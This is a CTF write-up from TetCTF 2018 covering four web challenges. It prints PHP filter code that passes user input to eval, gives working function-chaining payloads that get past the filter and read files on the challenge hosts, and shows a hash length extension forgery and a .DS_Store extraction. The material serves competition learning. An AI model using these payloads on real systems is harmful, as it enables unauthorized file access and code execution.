TetCTF - 2018

Web - PHPlimit Revenge

filter.php
<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']))
{
if(preg_match('/_|m|info|get/i',$_GET['code']))
{
die('<strong>va anh dech can gi nhieu ngoai em :(</strong><audio controls autoplay loop hidden><source src="assets/nhac.mp3" type="audio/mpeg"></audio>');
}
else
{
eval($_GET['code']);
}
}
else
{
show_source(__FILE__);
}
?>

I am not familiar with PHP code, but with a mindset of RE-er,...then JUST FUCKING DO IT!

Btw, i joined after contest started for a while (9 AM 4/1/2018), so they already released the phplimit revenge 2, i just need to read which funcs are filtered by 2, and use it to create my payload

payload1
import requests
url = "http://139.180.219.222/?code=print(readfile(end(scandir(realpath(chr(rand()))))));"
r = requests.get(url)
while len(r.content) == 0:
r = requests.get(url)
print r.content
#view-source:http://139.180.219.222/?code=print(readfile(end(scandir(realpath(chr(ord(join(localeconv()))))))));
payload2
#view-source:http://139.180.219.222/?code=print(readfile(end(scandir(realpath(chr(ord(join(localeconv()))))))));
flag
<?php
$fl0wer="TetCTF{_Limbo_Escaped!_Welcome_back_to_Real_Life_}";
?>

Web - PHPlimit revenge 2

filter
<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']))
{
if(preg_match('/_|m|info|get|strlen|rand|path/i',$_GET['code']))
{
die('<strong>va anh dech can gi nhieu ngoai em :(</strong><audio controls autoplay loop hidden><source src="assets/nhac.mp3" type="audio/mpeg"></audio>');
}
else
{
eval($_GET['code']);
}
}
else
{
show_source(__FILE__);
}
?>php

In this challenge, you couldnt use rand() anymore, so to get ".", i use localeconv()

With scandir(), i can print all file in current directory

Checking content file well_play_but_flag_not_here.php

#view-source:http://45.76.181.81/?code=print(readfile(end(scandir(current(localeconv())))));
<?php
$fl0wer="Flag not here! go to directory's parent directory";
?>

Checking parent folder ".." :

Found flag, now i chdir() to parent directory :

chdir() successed, now i need create '.' from 1. Here i use some math functions in php like sqrt(), exp(), sin(), cos(),...

I love calculatin! <3

I use e^1 = 2.7x

I use ord('2') = 50

I use sqrt(50) = 7.x

I use ceil(7.x) = 8

ord('8') = 56

octdec(56) = 46

chr(46) = '.' , so i got '.' huehuehuehue

exp(1) = e^1 = 2.xxxx
ord(2) = 50
sqrt(50) = 7.xx
ceil(7.x) = 8
ord('8') = 56
oct2dec(56) = 46
chr(46) = '.'

From now on, it is similar to phplimit revenge 1, just read flag, final payload :

final-payload
view-source:http://45.76.181.81/?code=print(readfile(end(scandir(chr(octdec(ord(ceil(sqrt(ord(exp(chdir(next(scandir(current(localeconv())))))))))))))));
flag
<?php
$flower="TetCTF{__Hey___PhP___Master___}";
?>
Thanks @Ariana for teaching me thinking in multiple base/dimension

Web - IQ Test 2

challenge.php
https://pastebin.com/7zdc5DNX

This is a challenge about hash length extension, I used this tool below to calculate saved and hash for level13

https://github.com/iagox86/hash_extender
payload
hash: 6ac223512cea8d11c0fdf14dccbfbe62
saved: c2VlZD10cnVlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAAAAAAAAmbGV2ZWw9eGlpaQ==

Now i have hash, have saved, so i created request with Burpsuite

Finally

TetCTF{__Happy_new_Y3aR__!!_H3re_Your_Flower_}

Web - File

I already meet this kind of challenge before in Matesctf 2018 round 2

Tried dirsearch :

Extract file /.DS_Store with this tool

https://github.com/lijiejie/ds_store_exp

Check h1ddenn

flag
TetCTF{__DS_Store__seems_sad__}

Last words & Credits

My dream team! <3